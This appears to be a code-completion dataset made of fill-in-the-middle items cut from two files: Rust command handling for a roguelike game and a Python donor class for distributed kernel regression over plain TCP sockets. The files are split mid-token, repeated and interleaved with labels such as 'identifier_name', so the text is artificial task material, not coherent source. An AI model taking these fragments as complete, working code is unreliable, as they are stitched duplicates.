a = npc.name(&context.state.world)
);
return Ok(());
}
cmd_add_action(context, Action::MoveOrAttack(dir))
}
fn cmd_add_action(context: &mut GameContext, action: Action) -> CommandResult<()> {
context.state.add_action(action);
Ok(())
}
fn cmd_look(context: &mut GameContext) -> CommandResult<()> {
select_tile(context, maybe_examine_tile).map(|_| ())
}
fn cmd_teleport(context: &mut GameContext) -> CommandResult<()> {
mes!(context.state.world, "Teleport where?");
let pos = select_tile(context, |_, _| ())?;
if context.state.world.can_walk(
pos,
Walkability::MonstersBlocking,
)
{
cmd_add_action(context, Action::Teleport(pos))
} else {
Err(CommandError::Invalid("The way is blocked."))
}
}
fn cmd_pickup(context: &mut GameContext) -> CommandResult<()> {
let first_item;
{
let world = &context.state.world;
let pos = player_pos(context)?;
first_item = world.find_entity(pos, |&e| world.ecs().items.has(e))
}
match first_item {
Some(item) => cmd_add_action(context, Action::Pickup(item)),
None => Err(CommandError::Invalid("You grab at air.")),
}
}
fn cmd_drop(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.iter().map(|i| i.name(&context.state.world)).collect();
let idx = menu_choice(context, names).ok_or(CommandError::Cancel)?;
cmd_add_action(context, Action::Drop(items[idx]))
}
fn cmd_inventory(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.into_iter()
.map(|i| {
context.state.world.ecs().names.get(i).unwrap().name.clone()
})
.collect();
let choose = menu_choice_indexed(context, names)?;
mes!(context.state.world, "You chose: {}", a = choose);
Err(CommandError::Cancel)
}
fn find_stair_dest(world: &World, pos: Point, dir: StairDir) -> CommandResult<StairDest> {
let cell = world.cell_const(&pos).ok_or(CommandError::Bug(
"World was not loaded at stair pos!",
))?;
match cell.feature {
Some(CellFeature::Stairs(stair_dir, dest)) => {
if stair_dir != dir {
return Err(CommandError::Cancel);
}
debug!(world.logger, "STAIR at {}: {:?}", pos, dest);
Ok(dest)
},
_ => Err(CommandError::Cancel),
}
}
fn player_pos(context: &GameContext) -> CommandResult<Point> {
let world = &context.state.world;
let player = world.player().ok_or(
CommandError::Bug("No player in the world!"),
)?;
let pos = world.position(player).ok_or(CommandError::Bug(
"Player has no position!",
))?;
Ok(pos)
}
fn cmd_use_stairs(context: &mut GameContext, dir: StairDir) -> CommandResult<()> {
let pos = player_pos(context)?;
let world = &mut context.state.world;
let next = find_stair_dest(world, pos, dir)?;
let (true_next, dest) = load_stair_dest(world, pos, next)?;
world.move_to_map(true_next, dest).unwrap();
debug!(world.logger, "map id: {:?}", world.map_id());
Ok(())
}
fn load_stair_dest(
world: &mut World,
stair_pos: Point,
next: StairDest,
) -> CommandResult<(World, Point)> {
match next {
StairDest::Generated(map_id, dest) => {
debug!(world.logger, "Found stair leading to: {:?}", map_id);
let world = world::serial::load_world(map_id).map_err(|_| {
CommandError::Bug("Failed to load already generated world!")
})?;
Ok((world, dest))
},
StairDest::Ungenerated => {
debug!(world.logger, "Failed to load map, generating...");
let res = {
generate_stair_dest(world, stair_pos)
};
debug!(
world.logger,
"new stairs: {:?}",
world.cell_const(&stair_pos)
);
res
},
}
}
fn generate_stair_dest(world: &mut World, stair_pos: Point) -> CommandResult<(World, Point)> {
let mut new_world = World::new()
.from_other_world(world)
.with_prefab("rogue")
.with_prefab_args(prefab_args!{ width: 100, height: 50, })
.build()
.map_err(|_| CommandError::Bug("Failed to generate stair!"))?;
let prev_id = world.flags().map_id;
let dest_id = new_world.flags().map_id;
let mut stairs_mut = world.cell_mut(&stair_pos).unwrap();
if let Some(CellFeature::Stairs(stair_dir, ref mut dest @ StairDest::Ungenerated)) =
stairs_mut.feature
{
let new_stair_pos = new_world.find_stairs_in().ok_or(CommandError::Bug(
"Generated world has no stairs!",
))?;
*dest = StairDest::Generated(dest_id, new_stair_pos);
new_world.place_stairs(stair_dir.reverse(), new_stair_pos, prev_id, stair_pos);
Ok((new_world, new_stair_pos))
} else {
Err(CommandError::Bug(
"Stairs should have already been found by now...",
))
}
}
use glium::glutin::{VirtualKeyCode, ElementState};
use glium::glutin;
use graphics::Color;
use point::LineIter;
use renderer;
fn maybe_examine_tile(pos: Point, world: &mut World) {
if let Some(mob) = world.mob_at(pos) {
if let Some(player) = world.player() {
if player.can_see_other(mob, world) {
mes!(world, "You see here a {}.", a = mob.name(world));
}
}
}
}
fn draw_targeting_line(player_pos: Option<Point>, world: &mut World) {
let camera = world.flags().camera;
if let Some(player_pos) = player_pos {
draw_line(player_pos, camera, world);
}
}
fn draw_line(start: Point, end: Point, world: &mut World) {
world.marks.clear();
for pos in LineIter::new(start, end) {
world.marks.add(pos, Color::new(255, 255, 255));
}
world.marks.add(end, Color::new(255, 255, 255));
}
/// Allow the player to choose a tile.
pub fn select_tile<F>(context: &mut GameContext, callback: F) -> CommandResult<Point>
where
F: Fn(Point, &mut World),
{
let mut selected = false;
let mut result = context.state.world.flags().camera;
let player_pos = context.state
.world
.player()
.map(|p| context.state.world.position(p))
.unwrap_or(None);
renderer::with_mut(|rc| {
draw_targeting_line(player_pos, &mut context.state.world);
rc.update(context);
rc.start_loop(|renderer, event| {
match event {
glutin::Event::KeyboardInput(ElementState::Pressed, _, Some(code)) => {
println!("Key: {:?}", code);
{
let world = &mut context.state.world;
match code {
VirtualKeyCode::Up => world.flags_mut().camera.y -= 1,
VirtualKeyCode::Down => world.flags_mut().camera.y += 1,
VirtualKeyCode::Left => world.flags_mut().camera.x -= 1,
VirtualKeyCode::Right => world.flags_mut().camera.x += 1,
VirtualKeyCode::Escape => return Some(renderer::Action::Stop),
VirtualKeyCode::Return => {
selected = true;
return Some(renderer::Action::Stop);
},
_ => (),
}
let camera = world.flags().camera;
result = camera;
callback(camera, world);
draw_targeting_line(player_pos, world);
}
renderer.update(context);
},
_ => (),
}
None
});
});
context.state.world.marks.clear();
if selected {
Ok(result)
} else {
Err(CommandError::Cancel)
}
} |
pub fn menu_choice(context: &mut GameContext, choices: Vec<String>) -> Option<usize> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut ChoiceLayer::new(choices))
})
}
pub fn menu_choice_indexed<T: Display + Clone>(
context: &mut GameContext,
mut choices: Vec<T>,
) -> CommandResult<T> {
let strings = choices.iter().cloned().map(|t| t.to_string()).collect();
let idx = menu_choice(context, strings).ok_or(CommandError::Cancel)?;
Ok(choices.remove(idx))
}
use renderer::ui::layers::InputLayer;
pub fn player_input(context: &mut GameContext, prompt: &str) -> Option<String> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut InputLayer::new(prompt))
})
} |
use renderer::ui::layers::ChoiceLayer; | random_line_split |
command.rs | use std::fmt::Display;
use GameContext;
use data::Walkability;
use engine::keys::{Key, KeyCode};
use ecs::traits::*;
use graphics::cell::{CellFeature, StairDest, StairDir};
use logic::Action;
use logic::entity::EntityQuery;
use point::{Direction, Point};
use world::traits::*;
use world::{self, World};
use super::debug_command::*;
pub type CommandResult<T> = Result<T, CommandError>;
pub enum CommandError {
Bug(&'static str),
Invalid(&'static str),
Debug(String),
Cancel,
}
/// A bindable command that can be executed by the player.
pub enum Command {
Move(Direction),
UseStairs(StairDir),
Look,
Pickup,
Drop,
Inventory,
Wait,
Quit,
DebugMenu,
Teleport,
}
impl From<Key> for Command {
fn from(key: Key) -> Command {
match key {
Key { code: KeyCode::Escape, .. } => Command::Quit,
Key { code: KeyCode::Left, .. } |
Key { code: KeyCode::H, .. } |
Key { code: KeyCode::NumPad4, .. } => Command::Move(Direction::W),
Key { code: KeyCode::Right, .. } |
Key { code: KeyCode::L, .. } |
Key { code: KeyCode::NumPad6, .. } => Command::Move(Direction::E),
Key { code: KeyCode::Up, .. } |
Key { code: KeyCode::K, .. } |
Key { code: KeyCode::NumPad8, .. } => Command::Move(Direction::N),
Key { code: KeyCode::Down, .. } |
Key { code: KeyCode::J, .. } |
Key { code: KeyCode::NumPad2, .. } => Command::Move(Direction::S),
Key { code: KeyCode::B, .. } |
Key { code: KeyCode::NumPad1, .. } => Command::Move(Direction::SW),
Key { code: KeyCode::N, .. } |
Key { code: KeyCode::NumPad3, .. } => Command::Move(Direction::SE),
Key { code: KeyCode::Y, .. } |
Key { code: KeyCode::NumPad7, .. } => Command::Move(Direction::NW),
Key { code: KeyCode::U, .. } |
Key { code: KeyCode::NumPad9, .. } => Command::Move(Direction::NE),
Key { code: KeyCode::Period, .. } => Command::UseStairs(StairDir::Ascending),
Key { code: KeyCode::Comma, .. } => Command::UseStairs(StairDir::Descending),
Key { code: KeyCode::M, .. } => Command::Look,
Key { code: KeyCode::G, .. } => Command::Pickup,
Key { code: KeyCode::D, .. } => Command::Drop,
Key { code: KeyCode::I, .. } => Command::Inventory,
Key { code: KeyCode::E, .. } => Command::Teleport,
Key { code: KeyCode::F1, .. } => Command::DebugMenu,
_ => Command::Wait,
}
}
}
pub fn process_player_command(context: &mut GameContext, command: Command) -> CommandResult<()> {
match command {
// TEMP: Commands can still be run even if there is no player?
Command::Quit => Err(CommandError::Invalid("Can't quit.")),
Command::Look => cmd_look(context),
Command::UseStairs(dir) => cmd_use_stairs(context, dir),
Command::Pickup => cmd_pickup(context),
Command::Drop => cmd_drop(context),
Command::Inventory => cmd_inventory(context),
Command::Move(dir) => cmd_player_move(context, dir),
Command::Wait => cmd_add_action(context, Action::Wait),
Command::DebugMenu => cmd_debug_menu(context),
Command::Teleport => cmd_teleport(context),
}
}
fn cmd_player_move(context: &mut GameContext, dir: Direction) -> CommandResult<()> {
// Check if we're bumping into something interactive, and if so don't consume a turn.
let position = player_pos(context)?;
let new_pos = position + dir;
let npc_opt = context.state.world.find_entity(
new_pos,
|e| context.state.world.is_npc(*e),
);
if let Some(npc) = npc_opt {
mes!(
context.state.world,
"{}: Hello!",
a = npc.name(&context.state.world)
);
return Ok(());
}
cmd_add_action(context, Action::MoveOrAttack(dir))
}
fn cmd_add_action(context: &mut GameContext, action: Action) -> CommandResult<()> {
context.state.add_action(action);
Ok(())
}
fn cmd_look(context: &mut GameContext) -> CommandResult<()> {
select_tile(context, maybe_examine_tile).map(|_| ())
}
fn cmd_teleport(context: &mut GameContext) -> CommandResult<()> {
mes!(context.state.world, "Teleport where?");
let pos = select_tile(context, |_, _| ())?;
if context.state.world.can_walk(
pos,
Walkability::MonstersBlocking,
)
{
cmd_add_action(context, Action::Teleport(pos))
} else {
Err(CommandError::Invalid("The way is blocked."))
}
}
fn cmd_pickup(context: &mut GameContext) -> CommandResult<()> {
let first_item;
{
let world = &context.state.world;
let pos = player_pos(context)?;
first_item = world.find_entity(pos, |&e| world.ecs().items.has(e))
}
match first_item {
Some(item) => cmd_add_action(context, Action::Pickup(item)),
None => Err(CommandError::Invalid("You grab at air.")),
}
}
fn cmd_drop(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.iter().map(|i| i.name(&context.state.world)).collect();
let idx = menu_choice(context, names).ok_or(CommandError::Cancel)?;
cmd_add_action(context, Action::Drop(items[idx]))
}
fn cmd_inventory(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.into_iter()
.map(|i| {
context.state.world.ecs().names.get(i).unwrap().name.clone()
})
.collect();
let choose = menu_choice_indexed(context, names)?;
mes!(context.state.world, "You chose: {}", a = choose);
Err(CommandError::Cancel)
}
fn find_stair_dest(world: &World, pos: Point, dir: StairDir) -> CommandResult<StairDest> {
let cell = world.cell_const(&pos).ok_or(CommandError::Bug(
"World was not loaded at stair pos!",
))?;
match cell.feature {
Some(CellFeature::Stairs(stair_dir, dest)) => {
if stair_dir != dir {
return Err(CommandError::Cancel);
}
debug!(world.logger, "STAIR at {}: {:?}", pos, dest);
Ok(dest)
},
_ => Err(CommandError::Cancel),
}
}
fn player_pos(context: &GameContext) -> CommandResult<Point> {
let world = &context.state.world;
let player = world.player().ok_or(
CommandError::Bug("No player in the world!"),
)?;
let pos = world.position(player).ok_or(CommandError::Bug(
"Player has no position!",
))?;
Ok(pos)
}
fn cmd_use_stairs(context: &mut GameContext, dir: StairDir) -> CommandResult<()> {
let pos = player_pos(context)?;
let world = &mut context.state.world;
let next = find_stair_dest(world, pos, dir)?;
let (true_next, dest) = load_stair_dest(world, pos, next)?;
world.move_to_map(true_next, dest).unwrap();
debug!(world.logger, "map id: {:?}", world.map_id());
Ok(())
}
fn load_stair_dest(
world: &mut World,
stair_pos: Point,
next: StairDest,
) -> CommandResult<(World, Point)> {
match next {
StairDest::Generated(map_id, dest) => {
debug!(world.logger, "Found stair leading to: {:?}", map_id);
let world = world::serial::load_world(map_id).map_err(|_| {
CommandError::Bug("Failed to load already generated world!")
})?;
Ok((world, dest))
},
StairDest::Ungenerated => {
debug!(world.logger, "Failed to load map, generating...");
let res = {
generate_stair_dest(world, stair_pos)
};
debug!(
world.logger,
"new stairs: {:?}",
world.cell_const(&stair_pos)
);
res
},
}
}
fn generate_stair_dest(world: &mut World, stair_pos: Point) -> CommandResult<(World, Point)> {
let mut new_world = World::new()
.from_other_world(world)
.with_prefab("rogue")
.with_prefab_args(prefab_args!{ width: 100, height: 50, })
.build()
.map_err(|_| CommandError::Bug("Failed to generate stair!"))?;
let prev_id = world.flags().map_id;
let dest_id = new_world.flags().map_id;
let mut stairs_mut = world.cell_mut(&stair_pos).unwrap();
if let Some(CellFeature::Stairs(stair_dir, ref mut dest @ StairDest::Ungenerated)) =
stairs_mut.feature
{
let new_stair_pos = new_world.find_stairs_in().ok_or(CommandError::Bug(
"Generated world has no stairs!",
))?;
*dest = StairDest::Generated(dest_id, new_stair_pos);
new_world.place_stairs(stair_dir.reverse(), new_stair_pos, prev_id, stair_pos);
Ok((new_world, new_stair_pos))
} else {
Err(CommandError::Bug(
"Stairs should have already been found by now...",
))
}
}
use glium::glutin::{VirtualKeyCode, ElementState};
use glium::glutin;
use graphics::Color;
use point::LineIter;
use renderer;
fn maybe_examine_tile(pos: Point, world: &mut World) {
if let Some(mob) = world.mob_at(pos) {
if let Some(player) = world.player() {
if player.can_see_other(mob, world) {
mes!(world, "You see here a {}.", a = mob.name(world));
}
}
}
}
fn draw_targeting_line(player_pos: Option<Point>, world: &mut World) {
let camera = world.flags().camera;
if let Some(player_pos) = player_pos {
draw_line(player_pos, camera, world);
}
}
fn | (start: Point, end: Point, world: &mut World) {
world.marks.clear();
for pos in LineIter::new(start, end) {
world.marks.add(pos, Color::new(255, 255, 255));
}
world.marks.add(end, Color::new(255, 255, 255));
}
/// Allow the player to choose a tile.
pub fn select_tile<F>(context: &mut GameContext, callback: F) -> CommandResult<Point>
where
F: Fn(Point, &mut World),
{
let mut selected = false;
let mut result = context.state.world.flags().camera;
let player_pos = context.state
.world
.player()
.map(|p| context.state.world.position(p))
.unwrap_or(None);
renderer::with_mut(|rc| {
draw_targeting_line(player_pos, &mut context.state.world);
rc.update(context);
rc.start_loop(|renderer, event| {
match event {
glutin::Event::KeyboardInput(ElementState::Pressed, _, Some(code)) => {
println!("Key: {:?}", code);
{
let world = &mut context.state.world;
match code {
VirtualKeyCode::Up => world.flags_mut().camera.y -= 1,
VirtualKeyCode::Down => world.flags_mut().camera.y += 1,
VirtualKeyCode::Left => world.flags_mut().camera.x -= 1,
VirtualKeyCode::Right => world.flags_mut().camera.x += 1,
VirtualKeyCode::Escape => return Some(renderer::Action::Stop),
VirtualKeyCode::Return => {
selected = true;
return Some(renderer::Action::Stop);
},
_ => (),
}
let camera = world.flags().camera;
result = camera;
callback(camera, world);
draw_targeting_line(player_pos, world);
}
renderer.update(context);
},
_ => (),
}
None
});
});
context.state.world.marks.clear();
if selected {
Ok(result)
} else {
Err(CommandError::Cancel)
}
}
use renderer::ui::layers::ChoiceLayer;
pub fn menu_choice(context: &mut GameContext, choices: Vec<String>) -> Option<usize> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut ChoiceLayer::new(choices))
})
}
pub fn menu_choice_indexed<T: Display + Clone>(
context: &mut GameContext,
mut choices: Vec<T>,
) -> CommandResult<T> {
let strings = choices.iter().cloned().map(|t| t.to_string()).collect();
let idx = menu_choice(context, strings).ok_or(CommandError::Cancel)?;
Ok(choices.remove(idx))
}
use renderer::ui::layers::InputLayer;
pub fn player_input(context: &mut GameContext, prompt: &str) -> Option<String> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut InputLayer::new(prompt))
})
}
| draw_line | identifier_name |
vanilla.py | # vanilla.py (DONOR)
# vanilla donor is the vanilla version of a donor
# that is, it uses unencrypted sockets, no SSL/TLS
# and performs the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha")
self.hasAlpha = False
else:
#failed
self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def negotiate(self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
|
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
'''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display()
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
else:
self.error("Failed to normalize. NPDC is null!")
def sizeof_internals(self):
if self._npdc is not None:
return self._npdc.size()
else:
self.error("Failed to obtain sizes. NPDC is null!")
def shutdown_connections(self):
try:
self._msocket.close()
except Exception as e:
self.expt(str(e))
| self.verbose("Partitioned and computed the kernel",self.kernel.shape) | conditional_block |
vanilla.py | # vanilla.py (DONOR)
# vanilla donor is the vanilla version of a donor
# that is, it uses unencrypted sockets, no SSL/TLS
# and performs the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha")
self.hasAlpha = False
else:
#failed
self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def negotiate(self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
self.verbose("Partitioned and computed the kernel",self.kernel.shape)
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
|
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
else:
self.error("Failed to normalize. NPDC is null!")
def sizeof_internals(self):
if self._npdc is not None:
return self._npdc.size()
else:
self.error("Failed to obtain sizes. NPDC is null!")
def shutdown_connections(self):
try:
self._msocket.close()
except Exception as e:
self.expt(str(e))
| '''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display() | identifier_body |
vanilla.py | # vanilla.py (DONOR)
# vanilla donor is the vanilla version of a donor
# that is, it uses unencrypted sockets, no SSL/TLS
# and performs the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
